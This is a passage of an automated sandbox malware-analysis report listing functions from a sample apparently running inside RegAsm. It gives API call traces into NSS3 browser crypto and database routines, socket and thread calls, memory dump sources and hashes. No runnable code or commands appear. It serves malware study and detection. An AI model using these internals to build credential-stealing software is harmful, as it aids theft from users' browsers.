                                                                                                                                                                                                                                                                  • PR_Free.NSS3(?), ref: 6CA27C73
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27C83
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6CA27C8D
                                                                                                                                                                                                                                                                  • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA27C9F
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27CAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 105370314-0
                                                                                                                                                                                                                                                                  • Opcode ID: a30c5eb6f2c4e41a008c267ed09ce694abd0762ab44970d54be7e5c1b4470f60
                                                                                                                                                                                                                                                                  • Instruction ID: cc57f49672ffaca065e18f47ff2d60396b98c4bd4be7a1f9202a1a1dba3f295d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a30c5eb6f2c4e41a008c267ed09ce694abd0762ab44970d54be7e5c1b4470f60
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF0C2B19106266BEB04AF3ADC09957775CEF11265B0A8435E809D3B00EB39E558CAE5
                                                                                                                                                                                                                                                                  Function 0041A2B1 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041A2BD
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __getptd_noexit.LIBCMT ref: 0041A497
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __amsg_exit.LIBCMT ref: 0041A4A4
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041A2D4
                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041A2E2
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041A2F2
                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A306
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                  • Opcode ID: 16e46384af68664acdf08ad980b36542ab3a6de7a31986bb16c0460f4cdbc7dc
                                                                                                                                                                                                                                                                  • Instruction ID: 50f6acadedf9674a1d0d0e35ce945bb774021c58f339519a48cdc3fe19dd2778
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16e46384af68664acdf08ad980b36542ab3a6de7a31986bb16c0460f4cdbc7dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F06D32A463109BD621BB6A9806BDA33A06F04728F50419FE418673D3DB7D4AE1CA5F
                                                                                                                                                                                                                                                                  Function 004078E6 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004078EB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407E3A
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 3207582090-1885708031
                                                                                                                                                                                                                                                                  • Opcode ID: 5ba8d67d83ff45aac454dddabf38f0f9527c0a4ba5204d8a2f286889d6b47792
                                                                                                                                                                                                                                                                  • Instruction ID: aad6668445d37f7ad79c688ef8f576ef062d2ad3d292c806b0f1f9f3b094801c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba8d67d83ff45aac454dddabf38f0f9527c0a4ba5204d8a2f286889d6b47792
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3126970904249EADF15EBE4C856BEEBB74AF15308F1440BEA006735C2EB781B4CDB65
                                                                                                                                                                                                                                                                  Function 6C8B7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8B7D35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: 64dc460cdf06c9ac7a14d8c7778a5ebb98fe5de974948cf1c2bd6268dd964817
                                                                                                                                                                                                                                                                  • Instruction ID: 1a54fd8b00baf2b2e914315b594ceaa609dc65151eaa4477a5ed4db55256655b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64dc460cdf06c9ac7a14d8c7778a5ebb98fe5de974948cf1c2bd6268dd964817
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C310671E043299BC720CF9DC9809BEB7F2BF44345B5949AAE844B7B85D271E851C7B0
                                                                                                                                                                                                                                                                  Function 6C8A6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C8A6D36
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • database corruption, xrefs: 6C8A6D2A
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C8A6D2F
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8A6D20
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                                                                                                                                  • Instruction ID: 4b33e74a8d73952baa1f15fc11e52287423b5446e2fa13fbb5a76ab6311a513d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B2102306003059BC3208E5DCA41B5AB7F2BF80349F148D2CD84AABF55E372F94687A2
                                                                                                                                                                                                                                                                  Function 6C9DCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C9DCC7B), ref: 6C9DCD7A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C9DCD8E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C9DCDA5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C9DCDB8
                                                                                                                                                                                                                                                                  • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C9DCCB5
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(6CA714F4,6CA702AC,00000090), ref: 6C9DCCD3
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(6CA71588,6CA702AC,00000090), ref: 6C9DCD2B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8F9AC0: socket.WSOCK32(?,00000017,6C8F99BE), ref: 6C8F9AE6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8F9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8F99BE), ref: 6C8F9AFC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C900590: closesocket.WSOCK32(6C8F9A8F,?,?,6C8F9A8F,00000000), ref: 6C900597
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                  • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                  • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                  • Opcode ID: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                                                                                                                                  • Instruction ID: 19e024a4d8fd6c8aea3c2b4e2c79a081a882536b859197bde4fdfd2fe8a28638
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11C3F9B003715EDB198F6D9817B623AF8B316218F089129E70DDBB40E635C48647F1
                                                                                                                                                                                                                                                                  Function 6C941CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_Initialize), ref: 6C941CD8
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C941CF1
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_Now.NSS3 ref: 6CA20A22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA20A35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA20A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_GetCurrentThread.NSS3 ref: 6CA20A70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA20A9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA20AC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsmprintf.NSS3(?,?), ref: 6CA20AE8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20B19
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20B48
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20C76
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_LogFlush.NSS3 ref: 6CA20C7E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                                                                                                                                                  • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                                                                                                                                                  • API String ID: 1907330108-3943720641
                                                                                                                                                                                                                                                                  • Opcode ID: a3e6739a0b39f1d19115e27f8741a5ef05d0002b8342f59b12604172e6cf7105
                                                                                                                                                                                                                                                                  • Instruction ID: 9380ef84e3a199a8c045f164c21f394af8608fb26a9c960ffbda1d596ab77fbf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3e6739a0b39f1d19115e27f8741a5ef05d0002b8342f59b12604172e6cf7105
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301D278300262DFCB09AF54D90CB5537B4BB9332AF08C024E409C2611DB34D89AD7B1
                                                                                                                                                                                                                                                                  Function 00410C92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411090,00000000,?,00000000,?), ref: 00410C9D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00411090,00000000,?,00000000,?), ref: 00410CA4
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00410CB5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                                  • Opcode ID: 7eeca3e9ebe060dc7ccab8c014955e422852b6cfeb659a64bbb6081be6be744c
                                                                                                                                                                                                                                                                  • Instruction ID: 4f05cc6a84d655efaef12042178a4e12218c853f4d7e42c50a1fb2c33520f410
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eeca3e9ebe060dc7ccab8c014955e422852b6cfeb659a64bbb6081be6be744c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50D0A731741224B7C62037E4BD0EF667F1CEB05BA2F400031FB0DD6151C9A1451187EE
                                                                                                                                                                                                                                                                  Function 6C982C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000,?,6C981289,?), ref: 6C982D72
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C982CA7,E80C76FF,?,6C981289,?), ref: 6C9833E9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C98342E
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C981289,?), ref: 6C982D61
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C980B21
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C980B64
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C981289,?), ref: 6C982D88
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C981289,?), ref: 6C982DAF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PR_CallOnceWithArg.NSS3(6CA72178,6C93BCF0,?), ref: 6C93B915
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C93B933
